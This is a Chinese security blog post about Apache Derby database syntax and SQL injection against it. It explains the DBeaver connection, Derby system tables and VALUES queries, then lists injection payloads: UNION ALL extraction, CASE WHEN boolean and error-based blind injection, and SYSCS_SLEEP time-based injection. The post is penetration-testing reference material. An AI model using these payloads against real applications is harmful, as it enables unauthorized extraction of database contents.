微慑信息网

derby数据库语法及注入相关

一次漏洞挖掘中,发现存在注入点,但没想到是derby数据库;

附与mysql数据库的对比图:

图片
在服务器上,它就是这样一堆文件:
图片

derby数据库的连接方法 :

使用Dbeaver:
图片
下载对应驱动:
图片
连接成功:
图片

相关语法:

比如有的地方,如查看当前数据库,不是跟其他sql一样使用select,而是使用VALUES:
VALUES CURRENT SCHEMA
图片
查看当前用户:
VALUES CURRENT_USER
图片

其他:


SYS.SYSTABLES
所有表信息

SYS.SYSSCHEMAS
所有 schema 信息

SYS.SYSCOLUMNS
所有列信息

SYS.SYSVIEWS
所有视图信息
图片
查看当前库中的所有表:
SELECT TABLENAME FROM 
            SYS.SYSTABLES
           WHERE SCHEMAID = (SELECT SCHEMAID FROM 
            SYS.SYSSCHEMAS
           WHERE SCHEMANAME = CURRENT SCHEMA);
图片
知道表之后,就直接select:
SELECT * FROM USER
图片

Derby 可用的注入语句:

1. UNION ALL 联合查询回显(Derby 不支持单纯 UNION)

    select 1 from ***  union all select TABLENAME from
SYS.SYSTABLES

2. 布尔盲注:CASE WHEN ... THEN ... ELSE ... END

    select case when SUBSTR((select TABLENAME from
SYS.SYSTABLES
fetch first 1 rows only),1,1)=’U’ then 1 else 0 end from ***–
    (CASE WHEN LENGTH(CURRENT SCHEMA) > 5 THEN 1 ELSE 1/0 END)–

3. 时间盲注:
SYSCS_UTIL.SYSCS_SLEEP(ms)

    select case when 1=1 then
SYSCS_UTIL.SYSCS_SLEEP(2000)
else 1 end from ****–

4. 系统表:
SYS.SYSTABLES

SYS.SYSCOLUMNS
 查询库表结构

5. 注释符号:--

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » derby数据库语法及注入相关

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫

微信扫一扫

登录

找回密码

注册